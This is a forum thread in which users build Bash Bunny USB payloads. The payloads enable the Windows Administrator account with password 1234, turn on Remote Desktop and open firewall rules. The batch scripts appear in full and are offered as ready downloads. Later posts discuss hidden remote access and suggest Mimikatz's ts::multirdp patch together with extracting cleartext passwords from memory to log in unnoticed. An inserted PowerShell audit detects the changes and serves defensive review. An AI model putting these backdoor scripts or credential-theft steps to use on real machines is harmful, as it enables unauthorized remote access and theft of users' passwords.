Vert Posted May 14, 2017 (edited)

The idea is to enable the admin account and RDP and open the ports required. So far I have come up with this batch file script:

rem enable.bat - activate the built-in Administrator account and turn on Remote Desktop
net user administrator /active:yes
rem with no switches this only prints the account's current settings
net user administrator
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
sc config TermService start= auto
net start TermService
rem legacy "netsh firewall" context for XP/2003; "netsh advfirewall" for Vista and later
netsh firewall set service RemoteDesktop enable
netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
exit

Then compile it as an exe so it can be run as admin from the bunny. I've also made a script to disable everything:

rem disable.bat - reverse the changes made by enable.bat
net user administrator /active:no
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f
sc config TermService start= auto
rem services are stopped with "net stop", not "netsh stop"
net stop TermService
netsh firewall set service RemoteDesktop disable
netsh advfirewall firewall set rule group="remote desktop" new enable=no
exit

I would note that this is just an idea and completely untested. The final step would simply be having the bunny run the exe files. I was also thinking it would be a good idea to dump the system's internal and external IP for later use. Maybe someone wants to step in and complete this half-finished payload or add to it.

Edited May 14, 2017 by Vert (update)
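An added example, not from the thread or its payloads: a PowerShell audit an administrator can run on a Windows 10 host to see whether it is in the state the enable script above leaves behind (Administrator account active, fDenyTSConnections set to 0, TermService running or set to auto-start, the "Remote Desktop" firewall rule group enabled), so each change can be reviewed and reverted. It assumes the built-in cmdlets available on Windows 10 / PowerShell 5.1.

```powershell
# Added example: report the four settings enable.bat changes. Run elevated.
function Get-RdpEnableIndicators {
    $findings = @()

    # 1. Built-in Administrator is the account whose SID ends in RID 500,
    #    whatever it has been renamed to.
    $admin = Get-LocalUser | Where-Object { $_.SID.Value -like 'S-1-5-21-*-500' }
    if ($admin -and $admin.Enabled) {
        $findings += "Built-in Administrator '$($admin.Name)' is enabled (last logon: $($admin.LastLogon))"
    }

    # 2. fDenyTSConnections = 0 means Remote Desktop connections are allowed.
    $tsKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server'
    $deny  = (Get-ItemProperty -Path $tsKey -Name fDenyTSConnections -ErrorAction SilentlyContinue).fDenyTSConnections
    if ($deny -eq 0) { $findings += 'fDenyTSConnections is 0: Remote Desktop is allowed' }

    # 3. TermService state and start mode (the script sets start= auto and starts it).
    $svc   = Get-Service -Name TermService -ErrorAction SilentlyContinue
    $start = (Get-CimInstance Win32_Service -Filter "Name='TermService'").StartMode
    if ($svc -and ($svc.Status -eq 'Running' -or $start -eq 'Auto')) {
        $findings += "TermService is $($svc.Status), start mode $start"
    }

    # 4. Inbound rules in the "Remote Desktop" group that are enabled.
    $rules = Get-NetFirewallRule -DisplayGroup 'Remote Desktop' -ErrorAction SilentlyContinue |
             Where-Object { $_.Enabled -eq 'True' -and $_.Direction -eq 'Inbound' }
    if ($rules) { $findings += "$(@($rules).Count) inbound 'Remote Desktop' firewall rule(s) enabled" }

    return $findings
}

$result = Get-RdpEnableIndicators
if ($result) { $result | ForEach-Object { Write-Output "[!] $_" } }
else         { Write-Output '[ok] No RDP-enable indicators found' }
```

For after-the-fact review, the account activation also lands in the Security log as event 4722 (a user account was enabled), and any resulting RDP session shows up as event 4624 with logon type 10.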
Dave-ee Jones Posted May 14, 2017

... Stole my idea. Well, mostly-ish. My idea was to use PowerShell to enable RDP and then host a hotspot, so you could access the PC from away from the PC and control it remotely. It'd be nice to be able to control it without a user (if there is one) seeing (a separate user being used in the background that you can't see).
Vert Posted May 14, 2017 Author (edited)

I'm in the later stages of testing the payload now. As is, it enables the admin account, puts a password of 1234 on it and enables RDP (script to enable and disable it all). I'm in the last stage of getting the payload to run as admin.

#RDPADMIN
disable.bat
enable.bat
-------------------------------------------------------------------------------------

#ADMINENABLE
Figured I'd add another bat; this one simply enables the admin account with password 1234. Switch yes to no to disable again.
admin.bat
--------------------------------------------------------------------------------------

Edited May 14, 2017 by Vert (update)
Vert Posted May 14, 2017 Author (edited)

Presenting 3 new bunny payloads:
Admin: enables admin account with password 1234
Adminrdp: enables admin with pass 1234 & RDP + ports
UNadminrdp: disables admin account & RDP + ports

UNadminrdp.rar
Adminrdp.rar
Admin.rar

I take no credit for these; I only mashed it all together and tested it. My intended use for these was purely for making system repairs easier, and I take no responsibility for how they may be used.

Edited May 14, 2017 by Vert
Dave-ee Jones Posted May 14, 2017

39 minutes ago, Vert said:
> Presenting 3 new bunny payloads:
> Admin: enables admin account with password 1234
> Adminrdp: enables admin with pass 1234 & RDP + ports
> UNadminrdp: disables admin account & RDP + ports
> UNadminrdp.rar Adminrdp.rar Admin.rar
> I take no credit for these; I only mashed it all together and tested it. My intended use for these was purely for making system repairs easier, and I take no responsibility for how they may be used.

I'll take a look at this. :)
Vert Posted May 14, 2017 Author (edited)

The bat files posted above are the exact same as the compiled .exes in the final result, so if you would rather compile the bats yourself you're welcome to do so. It might even be possible to use the bat files rather than the .exes with some changes to the payload, but I did not test any of the payloads in this way.

Edited May 14, 2017 by Vert
rottingsun Posted May 14, 2017

I believe RDP locks the session of the currently logged in user, which would be a dead giveaway. Would this payload be more in the context of a sneak attack while a user is away? Not knocking it - just wondering the intent.
Vert Posted May 14, 2017 Author (edited)

When you connect over RDP it pops a 30 sec window saying OK or Cancel that another user is logging in; it isn't very sneaky the way this is set up. If someone knows a better, sneakier method it could be interesting. As I noted, my intent was legit usage for system repairs. My testing was performed on 2 Windows 10 Pro systems, but I did add some older commands that should work with older versions of Windows as far back as XP; they remain untested.

Edited May 14, 2017 by Vert
rottingsun Posted May 14, 2017

4 minutes ago, Vert said:
> When you connect over RDP it pops a 30 sec window saying OK or Cancel that another user is logging in; it isn't very sneaky the way this is set up. If someone knows a better, sneakier method it could be interesting. As I noted, my intent was legit usage for system repairs.

Very nice. I actually never thought of the bunny/ducky in the context of legitimate uses. I got a bunny personally so I can demo to management what happens if I grant a non-IT user local admin perms like I sometimes get asked.
Vert Posted May 14, 2017 Author (edited)

The bunny is just an automation tool; it isn't good nor evil by itself, it's how you use it. Much like a hammer: most use it for putting in nails, but others have been known to cave in skulls with it. The person using a tool is its master; the tool is useless without you to control it.

Edited May 14, 2017 by Vert
Dave-ee Jones Posted May 14, 2017

You could potentially put third-party remote-desktop software on the PC and then tell the PC to run it in the background; then you can connect to it via a phone or laptop elsewhere (via the PC's hotspot or over the internet) using an app on your side.
redteamwynns Posted May 15, 2017

3 hours ago, Vert said:
> When you connect over RDP it pops a 30 sec window saying OK or Cancel that another user is logging in; it isn't very sneaky the way this is set up. If someone knows a better, sneakier method it could be interesting. As I noted, my intent was legit usage for system repairs. My testing was performed on 2 Windows 10 Pro systems, but I did add some older commands that should work with older versions of Windows as far back as XP; they remain untested.

Vert, Mimikatz can patch RDP services in real time to allow multiple users to connect, and I don't think it notifies the other user at all. It would be neat to run Mimikatz first if you've already got admin privs, extract the user's cleartext pw out of memory, and RDP as the same user to try to fly a bit more under the radar.

Invoke-Mimikatz -Command 'privilege::debug ts::multirdp exit'
Vert Posted May 15, 2017 Author (edited)

3 minutes ago, redteamwynns said:
> Vert, Mimikatz can patch RDP services in real time to allow multiple users to connect, and I don't think it notifies the other user at all. It would be neat to run Mimikatz first if you've already got admin privs, extract the user's cleartext pw out of memory, and RDP as the same user to try to fly a bit more under the radar.
> Invoke-Mimikatz -Command 'privilege::debug ts::multirdp exit'

Sounds interesting, and I welcome others to improve on what I started. It seems like a good jumping-off point / proof of concept.

Edited May 15, 2017 by Vert
Dave-ee Jones Posted May 15, 2017

1 hour ago, redteamwynns said:
> Vert, Mimikatz can patch RDP services in real time to allow multiple users to connect, and I don't think it notifies the other user at all. It would be neat to run Mimikatz first if you've already got admin privs, extract the user's cleartext pw out of memory, and RDP as the same user to try to fly a bit more under the radar.
> Invoke-Mimikatz -Command 'privilege::debug ts::multirdp exit'

It does sound interesting. I'll look into that.